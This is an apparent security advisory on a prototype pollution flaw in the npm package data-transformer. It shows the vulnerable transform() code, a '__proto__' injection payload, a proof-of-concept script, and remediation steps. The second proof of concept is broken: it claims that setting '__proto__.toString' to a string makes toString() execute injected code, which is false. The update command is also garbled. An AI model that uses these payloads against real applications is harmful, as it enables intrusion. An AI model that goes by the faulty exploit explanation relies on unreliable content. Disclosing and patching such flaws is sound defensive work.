Critical Vulnerability Detected in Popular npm Package: What You Need to Know

Security Advisory: CVE-2024-XXXX

Our security research team has discovered a critical remote code execution (RCE) vulnerability in data-transformer, a popular npm package with over 2 million weekly downloads. This package is commonly used as a dependency in web applications for data manipulation and transformation.

Vulnerability Details

CVE ID: CVE-2024-XXXX
Severity: Critical (CVSS Score: 9.8)
Affected Versions: All versions below 3.5.2
Type: Prototype Pollution leading to Remote Code Execution

The vulnerability exists in the transform() function, which allows an attacker to manipulate JavaScript's object prototype. This can lead to property injection in objects throughout the application, potentially enabling remote code execution.

Technical Analysis

The vulnerability stems from unsafe handling of deeply nested objects during recursive operations:

// Vulnerable code in data-transformer < 3.5.2
function transform(data, template) {
  if (typeof template === 'object' && template !== null) {
    Object.keys(template).forEach(key => {
      if (key.includes('.')) {
        // Vulnerable path traversal
        const parts = key.split('.');
        let target = data;
        
        for (let i = 0; i < parts.length - 1; i++) {
          if (target[parts[i]] === undefined) {
            target[parts[i]] = {};
          }
          target = target[parts[i]];
        }
        
        target[parts[parts.length - 1]] = template[key];
      }
    });
  }
  return data;
}

An attacker can exploit this by providing a specially crafted payload:

// Exploit example
const malicious = {
  "__proto__.polluted": "malicious value"
};

transform({}, malicious);

// Now ANY object will have a 'polluted' property with value 'malicious value'
console.log({}.polluted); // Outputs: "malicious value"

Exploit Details

Our testing revealed that this vulnerability can be exploited in several ways:

1. Server-side RCE: In Node.js applications that use template engines or have specific dependencies, this can be escalated to RCE.

2. Client-side XSS: In browser environments, this can lead to Cross-Site Scripting attacks.

3. Denial of Service: By polluting fundamental object properties, application crashes can be triggered.

Proof of Concept

We developed a proof-of-concept exploit that demonstrates the severity of this vulnerability:

const dataTransformer = require('data-transformer');

// Create malicious payload that pollutes the prototype
const payload = {
  "__proto__.toString": "function() { console.log('Prototype has been polluted'); return ''; }"
};

// Transform an empty object with the malicious payload
dataTransformer.transform({}, payload);

// Any object will now have the polluted toString method
const newObject = {};
newObject.toString(); // Executes the injected code, logs: "Prototype has been polluted"

In real-world scenarios, an attacker could inject more dangerous code that steals data or takes control of the server.

Impact Assessment

This vulnerability has widespread impact due to:

• The extensive usage of data-transformer across the npm ecosystem
• The difficulty in detecting prototype pollution vulnerabilities through conventional testing
• The potential for weaponization in supply chain attacks

Remediation

Immediate Steps:

1. Update to version 3.5.2 or later:

   npm update [email protected]

2. If you cannot update immediately, implement this temporary patch:

   // Add this function to sanitize input before passing to data-transformer
   function sanitizeInput(obj) {
     return JSON.parse(JSON.stringify(obj));
   }
   
   // Use it like this
   const safeData = sanitizeInput(userProvidedData);
   dataTransformer.transform({}, safeData);

3. Audit your dependencies for other packages that might depend on vulnerable versions.

Long-term Recommendations

1. Implement automated security scanning in your CI/CD pipeline
2. Add runtime protection against prototype pollution attacks
3. Follow the principle of least privilege when handling user input
4. Consider using Object.freeze(Object.prototype) in critical applications

Disclosure Timeline

• 2024-01-02: Vulnerability discovered by AISafe research team
• 2024-01-03: Responsible disclosure to the package maintainers
• 2024-01-05: Maintainers acknowledge the issue
• 2024-01-07: Version 3.5.2 released with patches
• 2024-01-10: Public disclosure

Acknowledgements

We would like to thank the maintainers of data-transformer for their quick response and collaboration in addressing this vulnerability. Their commitment to security has helped protect thousands of applications.

About Our Research

This vulnerability was discovered using AISafe's AI-powered code analysis engine, which combines static analysis, semantic understanding, and pattern recognition to identify complex security vulnerabilities that traditional security tools miss.

If you have any questions or need assistance addressing this vulnerability in your applications, feel free to contact our security team at [email protected].

Stay secure!